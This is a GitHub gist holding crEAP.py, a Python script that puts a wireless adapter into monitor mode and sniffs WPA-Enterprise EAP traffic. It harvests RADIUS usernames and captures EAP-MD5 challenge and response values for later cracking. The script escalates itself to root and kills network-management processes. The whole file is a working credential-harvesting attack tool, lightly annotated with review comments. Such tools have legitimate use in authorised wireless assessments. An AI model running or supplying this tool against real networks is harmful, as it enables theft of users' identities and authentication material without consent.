Created
December 17, 2015 08:31
crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if insecure protocols are in use, crEAP will harvest Radius usernames and handshakes. (https://github.com/Shellntel/scripts/blob/master/crEAP.py)
#!/usr/bin/python | |
#crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if | |
#insecure protocols are in use, crEAP will harvest Radius usernames and handshakes. | |
#Author: Snizz | |
#Requirements: Should be run as root/sudo. | |
# | |
# Python Scapy Community (scapy-com) - Dev version of Scapy which supports additional | |
# filters such as EAP types. Get @ https://bitbucket.org/secdev/scapy-com | |
# | |
# Airmon-ng, airodump-ng (Aircrack-ng Suite - http://www.aircrack-ng.org/) | |
# | |
# Screen for terminal management/ease of launching airodump (requirement for
# Promiscuous/Channel hopping to capture the EAPOL packets)
import logging | |
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
from collections import defaultdict | |
from scapy.all import * | |
import sys | |
import thread | |
import subprocess | |
class bcolors:
    """ANSI SGR escape sequences used to colour the script's terminal output."""

    # Bright foreground colours.
    FAIL = '\033[91m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    OKBLUE = '\033[94m'
    HEADER = '\033[95m'

    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Resets every colour/attribute set so far; append after coloured text.
    ENDC = '\033[0m'
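# `os` is used below but was never imported by name in this file; importing it
# here removes the reliance on the wildcard scapy import happening to expose it.
import os

version = "1.1"

# Got root/sudo?
# Monitor mode and raw capture need root, so a non-root start re-executes the
# same command line under sudo instead of failing later.
euid = os.geteuid()
if euid != 0:
    print(bcolors.FAIL + "\n[-]" + bcolors.ENDC + "Script not started as root. Running sudo...")
    # os.execlpe(file, arg0, arg1, ..., env): the last positional argument is
    # the environment mapping. The caller's environment is handed to sudo
    # unchanged; what survives into the root process depends on sudoers policy.
    args = ['sudo', sys.executable] + sys.argv + [os.environ]
    # Replaces the currently-running process with sudo; does not return on success.
    os.execlpe('sudo', *args)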
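# Python Scapy-Com check (inspiration from EAPEAK/McIntyre).
# The import only succeeds on a scapy build that ships `eap_types`, which is
# how the script tells the community fork apart from stock scapy.
try:
    from scapy.layers.l2 import eap_types as EAP_TYPES
except ImportError:
    hint_tag = bcolors.WARNING + "[-]" + bcolors.ENDC
    print(bcolors.FAIL + "\n[!]" + bcolors.ENDC + " Scapy-Com not installed, needed for parsing EAPOL packets.")
    # NOTE(review): these hints install an unpinned development checkout
    # system-wide and remove the packaged scapy; confirm the source location and
    # pin a reviewed revision before following them on an assessment host.
    print(hint_tag + " Download: hg clone https://bitbucket.org/secdev/scapy-com")
    print(hint_tag + " Remove: dpkg --ignore-depends=python-scapy -r python-scapy")
    print(hint_tag + " Install: python setup.py install")
    # A missing dependency is a failure: report it with a non-zero status so
    # wrappers do not mistake it for a clean run.
    sys.exit(1)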
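# Prereq checks:
# Each external tool is started once; an OSError from the spawn means the
# binary is not on PATH. The tool's own exit status is deliberately ignored.
requirement = ['airmon-ng', 'airodump-ng', 'screen']
# One null sink for all probes, closed when the checks finish (it used to be
# re-opened for every tool and never closed).
with open("/dev/null", "w") as devnull:
    for r in requirement:
        # A bare `screen` would open an interactive session, so it is probed
        # with -v; the aircrack-ng tools are run without arguments.
        probe = [r, "-v"] if r == 'screen' else [r]
        try:
            subprocess.call(probe, stdout=devnull)
        except OSError:
            print(bcolors.FAIL + "\n[-]" + bcolors.ENDC + r + " dependancy not detected, exiting.")
            # Non-zero status: the run did not succeed.
            sys.exit(1)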
# Start-up banner: ASCII-art logo followed by a two-line description, wrapped
# in the OKGREEN colour code and reset with ENDC.
# NOTE(review): the logo's spacing is reproduced as it appears in this listing;
# the original column alignment may have been lost, and a line ending in a
# backslash inside this non-raw string joins with the next line -- confirm
# against the upstream file before relying on the exact bytes.
banner = bcolors.OKGREEN + """
___________ _____ __________
__________\_ _____/ / _ \\______ \
_/ ___\_ __ \ __)_ / /_\ \| ___/
\ \___| | \/ \/ | \ |
\___ >__| /_______ /\____|__ /____|
\/ \/ \/
crEAP is a utility which will identify WPA Enterprise Mode Encryption types and if
insecure protocols are in use, crEAP will harvest Radius usernames and handshakes.
""" + bcolors.ENDC
# Print the banner, then the version string in green.
print "\n"+banner
print "Version: "+bcolors.OKGREEN +version+bcolors.ENDC
#Check to see if WLAN is in MONITOR mode, if not, set it | |
# Module-level capture state shared by the packet callbacks below.
# EAP-MD5 challenges keyed by EAP id, plus a dict that is declared but not
# touched by the code in this listing.
md5challenge, requser = {}, {}
# Most recent identity details seen; start as empty dicts until a packet sets them.
USER, USERID, USERNAME = {}, {}, {}
# Every identity reported, and the de-duplicated view rebuilt by addtolist().
UserList, checked = [], []
# Lookup table filled from beacons; unknown keys yield an empty list. It is
# seeded with two placeholder entries ('mac' and 'net').
bssids = defaultdict(list, mac="00:00:00:00:00:00", net='testing')
# Interface Foo
# Show the operator which wireless interfaces exist before asking for one.
iface_heading = "\n" + bcolors.WARNING + "[-]" + bcolors.ENDC + " Current Wireless Interfaces\n" + bcolors.ENDC
print(iface_heading)
iwconfig_proc = subprocess.Popen("iwconfig", shell=True, stdout=subprocess.PIPE)
print(iwconfig_proc.stdout.read())
# Kill any screen session named crEAP left over from an earlier run; the
# output is read only to wait for the command and is then discarded.
stale_session = subprocess.Popen("screen -X -S crEAP kill", shell=True, stdout=subprocess.PIPE)
stale_session.stdout.read()
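# Used only to validate the interface name typed by the operator.
import re

try:
    adapter = raw_input(bcolors.WARNING + "Specify wireless interface: " + bcolors.FAIL + "(This will enable MONITOR mode)" + bcolors.ENDC + " (wlan0, wlan2, etc): ")
except (EOFError, KeyboardInterrupt):
    print("\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Issue specifying the wireless interface, exiting.\n")
    sys.exit(1)

# The name ends up on command lines run as root, including one typed into a
# shell inside the screen session, so accept nothing but a plain interface
# name: at most 15 characters, alphanumeric first (so it cannot be read as an
# option), then letters, digits, '_', '.' or '-'.
adapter = adapter.strip()
if not re.match(r'[A-Za-z0-9][A-Za-z0-9_.-]{0,14}\Z', adapter):
    print("\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Issue specifying the wireless interface, exiting.\n")
    sys.exit(1)

try:
    print(bcolors.WARNING + "\n[-]" + bcolors.ENDC + " Enabling monitor interface and channel hopping...")
    # Argument lists (no shell) keep the interface name a single argv entry.
    # `check kill` stops network-management processes that interfere with
    # monitor mode; nothing in this script restarts them afterwards.
    subprocess.Popen(["airmon-ng", "check", "kill"], stdout=subprocess.PIPE).communicate()
    subprocess.Popen(["airmon-ng", "start", adapter], stdout=subprocess.PIPE).communicate()
    # Assumes airmon-ng names the monitor interface "<name>mon"; the result is
    # not verified here.
    adapter = adapter + "mon"
except OSError:
    print("\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Unable to enable MONITOR mode, exiting.\n")
    # The message says "exiting"; previously execution carried on regardless.
    sys.exit(1)

try:
    # Detached screen session that hosts airodump-ng while this process sniffs.
    subprocess.Popen(["screen", "-dmS", "crEAP"], stdout=subprocess.PIPE).communicate()
    # `stuff` types this line (with its trailing newline) into the session's
    # shell. Passing it as one argv entry avoids depending on /bin/sh
    # understanding $'...' quoting.
    stuffed_line = "sudo airodump-ng -c1 " + adapter + "\n"
    subprocess.Popen(["screen", "-r", "crEAP", "-X", "stuff", stuffed_line], stdout=subprocess.PIPE).communicate()
except OSError:
    print("\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Unable to set channel hopping and promiscuous mode, exiting.\n")
    sys.exit(1)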
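def _printable(value):
    """Return str(value) with control characters replaced by '?'.

    Identities and network names come straight from received frames, so they
    must not be able to send escape sequences to the operator's terminal.
    """
    return "".join(ch if ord(ch) >= 32 and ord(ch) != 127 else "?" for ch in str(value))


def _announce_eap(method, ap_addr):
    """Print the detection lines shared by every EAP method.

    method  -- label such as "EAP-PEAP"
    ap_addr -- MAC address used to look up the network name recorded by get_bssid()
    """
    tag = bcolors.OKGREEN + "[-]" + bcolors.ENDC
    # .get() avoids inserting an empty placeholder for an address that has not
    # been seen in a beacon yet, and the fallback keeps the string
    # concatenation below from failing on a non-string value.
    network = bssids.get(ap_addr) or "unknown"
    print("\n" + bcolors.OKGREEN + "[!]" + bcolors.ENDC + " " + method + " Authentication Detected")
    print(tag + " BSSID: " + _printable(network))
    print(tag + " Auth ID: " + str(USERID))
    print(tag + " User ID: " + _printable(USER))


def eapol_header(packet):
    """sniff() callback: report EAP identities and the EAP method in use.

    EAP type 1 (Identity) updates the last seen id and, for responses
    (code 2), the identity string. Types 4 (MD5), 25 (PEAP) and 13 (TLS)
    print a detection summary and record the identity via addtolist().
    Any error while dissecting a packet ends the program with status 1.
    """
    global USERID
    global USER
    tag = bcolors.OKGREEN + "[-]" + bcolors.ENDC
    #packet.show()
    for pkt in packet:
        get_bssid(pkt)
        try:
            if not pkt.haslayer(EAP):
                continue
            eap = pkt[EAP]
            if eap.type == 1:  # Identified an EAP authentication
                USERID = eap.id
                if eap.code == 2:
                    USER = eap.identity
            # EAP-MD5 - Credit to EAPMD5crack for logic assistance
            if eap.type == 4:  # Found EAP-MD5
                EAPID = eap.id
                if eap.code == 1:
                    # Skips the first payload byte and keeps the next 16
                    # (presumably a size byte followed by the MD5 value).
                    md5challenge[EAPID] = eap.load[1:17]
                    _announce_eap("EAP-MD5", pkt.addr2)
                    print(tag + " MD5 Challenge: " + md5challenge[EAPID].encode("hex"))
                    addtolist(USER)
                elif eap.code == 2:
                    # This branch used to reference undefined names
                    # (`packets`, `md5response`), so it always raised and hit
                    # the handler below. The value is only printed, so a
                    # local is enough.
                    md5_response = eap.load[1:17]
                    print(tag + " MD5 Response: " + md5_response.encode("hex"))
            # EAP-PEAP
            elif eap.type == 25:  # Found EAP-PEAP
                if eap.code == 2:
                    # reverse as it is the destination mac (Client->Server Identify)
                    _announce_eap("EAP-PEAP", pkt.addr1)
                    addtolist(USER)
            # EAP-TLS
            elif eap.type == 13:  # Found EAP-TLS
                if eap.code == 2:
                    # Also a client response, so the access point is the
                    # receiver address, as in the PEAP case.
                    _announce_eap("EAP-TLS", pkt.addr1)
                    addtolist(USER)
        except Exception as err:
            # Exception (not a bare except) lets Ctrl+C reach sniff() instead
            # of being reported as a scapy problem.
            print("\n" + bcolors.FAIL + "[!]" + bcolors.ENDC + " Python Scapy not able to extract EAPOL data, make sure scapy-com is installed which supports EAP types. (https://bitbucket.org/secdev/scapy-com)\n")
            print(bcolors.FAIL + "[!]" + bcolors.ENDC + " Error detail: " + repr(err))
            sys.exit(1)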
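def get_bssid(pkt):
    """Record the network name advertised in a beacon, keyed by the sender's MAC.

    Only 802.11 management frames (type 0) with subtype 8 (beacon) are used.
    The stored value is pkt.info (presumably the SSID element -- confirm
    against the scapy build in use). Beacon contents are unauthenticated, so
    the stored name is untrusted data.
    """
    if not pkt.haslayer(Dot11):
        return
    if pkt.type == 0 and pkt.subtype == 8:
        # Look the sender up by key. The earlier substring scan over stored
        # values skipped an access point whenever its name appeared inside any
        # name already recorded. An empty entry (the defaultdict placeholder
        # created by a plain bssids[...] read) is overwritten as well.
        if not bssids.get(pkt.addr2):
            bssids[pkt.addr2] = pkt.info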
def addtolist(USER):
    """Append USER to UserList and rebuild `checked` as its unique entries.

    `checked` is rebound to a new list holding each distinct identity once,
    in order of first appearance.
    """
    global checked
    UserList.append(USER)
    unique_users = []
    for entry in UserList:
        if entry in unique_users:
            continue
        unique_users.append(entry)
    checked = unique_users
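# Main and EAPOL-HEADER
# Sniff until the operator interrupts, then restore the interface on every
# exit path. Cleanup used to be skipped on any error, leaving the adapter in
# monitor mode and the screen session running.
sniff_failed = False
try:
    print(bcolors.WARNING + "\n[-]" + bcolors.ENDC + " Sniffing for EAPOL packets on interface"
          + " " + str(adapter) + " " + "... " + bcolors.FAIL + "Ctrl+C to exit" + bcolors.ENDC)
    conf.iface = adapter
    sniff(iface=adapter, prn=eapol_header)
    print("\n" + bcolors.FAIL + "\n[!]" + bcolors.ENDC + " User requested interrupt, cleaning up monitor interface and exiting...\n")
except Exception:
    # This message was a bare string expression before and never printed.
    # SystemExit raised by the callback is not an Exception, so it passes
    # through here but still runs the finally block.
    print("\n" + bcolors.FAIL + "\n[!]" + bcolors.ENDC + " Issue sniffing packets, ensure python's scapy-com in installed (https://bitbucket.org/secdev/scapy-com).\n")
    sniff_failed = True
finally:
    print(bcolors.WARNING + "[-]" + bcolors.ENDC + " Cleaning up interfaces...\n")
    # Argument lists, not shell strings: the interface name stays one argv entry.
    for cleanup_cmd in (["screen", "-X", "-S", "crEAP", "kill"],
                        ["sudo", "airmon-ng", "stop", adapter]):
        try:
            subprocess.Popen(cleanup_cmd, stdout=subprocess.PIPE).communicate()
        except OSError:
            # Best effort: still attempt the remaining command.
            print(bcolors.FAIL + "[!]" + bcolors.ENDC + " Cleanup command failed: " + " ".join(cleanup_cmd))

if sniff_failed:
    sys.exit(1)

print(bcolors.OKGREEN + "[-]" + bcolors.ENDC + " Unique Harvested Users:")
# Printing the list shows each entry via repr(), so control characters in
# captured identities are escaped rather than sent to the terminal.
print(checked)
print("\n")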